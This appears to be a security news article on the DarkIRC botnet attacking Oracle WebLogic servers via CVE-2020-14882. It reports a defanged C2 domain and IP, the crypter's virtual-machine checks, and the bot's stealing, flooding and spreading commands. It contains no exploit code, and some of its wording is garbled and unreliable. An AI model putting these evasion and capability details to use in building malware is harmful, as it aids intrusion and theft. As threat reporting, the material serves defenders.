Recently, the Juniper threat lab has identified a DarkIRC botnet that is actively attacking thousands of exposed Oracle WebLogic servers. All these attacks are intended to exploit the CVE-2020-14882 remote code execution vulnerability that Oracle fixed two months ago.
Recently, Cyber Security News reported that the hackers have started investigating all the server those are using the Critical Oracle WebLogic. the WebLogic Server flaw that is named CVE-2020-14882 that can easily be exploited by threat actors with network access through HTTP.
There are nearly 3000 Oracle WebLogic servers, and all these servers are reachable over the internet that are based on Shodan stats, and not only this, but it also enables unauthenticated attackers to administer remote code on all the targeted servers.
DarkIRC
The experts reported that DarkIRC is addressed on unpatched servers utilizing a PowerShell script that has been executed through an HTTP GET request in the frame of an ill-disposed binary, which appears with both anti-analysis and anti-sandbox skills.
However, the attacks will execute a PowerShell script to download and administer a binary file hosted in cnc[.]c25e6559668942[.]xyz. The cybersecurity researchers have also mentioned the source IP that is 83.97.20.90. And this IP fixes the C&C of the Bot, which indicates that the attacker IP is the same as the C&C.
The Crypter
The Crypter or the packer is generally used to hide the actual purpose, and it also evades all the detection. Moreover, Crypter also carries anti-analysis and anti-sandbox functions. These functions work to identify if the Crypter is running under the virtualized environments to decide if it should not proceed with its malicious routine.
Virtual environments used
- VMware
- VirtualBox
- VBox
- QEMU
- Xen
Bot Functions
According to the report that has been given by the expert, there are several functions that bot includes, and here we have mentioned them below:-
- Browser Stealer
- Keylogging
- Bitcoin Clipper
- DDoS
- Slowloris
- RUDY
- TCP Flood
- HTTP Flood
- UDP Flood
- Syn Flood
- Worm or spread itself in the network
- Download Files
- Execute Commands
Who is behind this?
The cybersecurity researchers of Juniper threat lab found an account in Hack Forums by the name of “Freak_OG” that got revealed in this botnet earlier in August 2020 for $75USD. Moreover, on November 1, the corresponding account was posted a FUD Crypter, and it has been selling it for $25USD.
The experts are not yet confirmed that if the bot operator who attacked the honeypot is a similar person who is promoting this malware in Hack Forums or one of their customers.
Bot commands
- Steal: Take browser passwords
- mssql: Spread via mssql (brute force)
- stopall: Stop all flood attacks
- rudy: Start or stop rudy flood attacks. If the command includes stopping, it means stop rudy attacks.
- rdp: Spread via RDP (brute force)
- update: Renew this bot
- upload: Upload files
- dlexerem: Download, execute and remove
- udp: Start/Stop udp flood attacks
- version: Get version info of the infected system
- dlexe: Download and execute
- username: Get username of the infected system
- cd: Set current directory
- getip: Get the IP address of the infected system
- md5: Get config md5 of Bot
- usbspread: Spread via USB
- tcp: Start/Stop tcp flood attack
- discord: Steal discord token
- botversion: Get bot version
- syn: Syn flood
- HTTP: Http flood
- slowloris: Slowloris DDoS attack
- uninstall: Uninstall itself
- smb: Spread via SMB
- cmd: Run command
Apart from this, the security experts are still investigating the whole attack so that they can found all the victims accordingly. However, one of the quickest techniques to be victimized is to utilize a zero-day exploit and attack the internet, and it can be done through a spray-and-pray method.
You can follow us on Linkedin, Twitter, Facebook for daily Cyber security and hacking news updates.
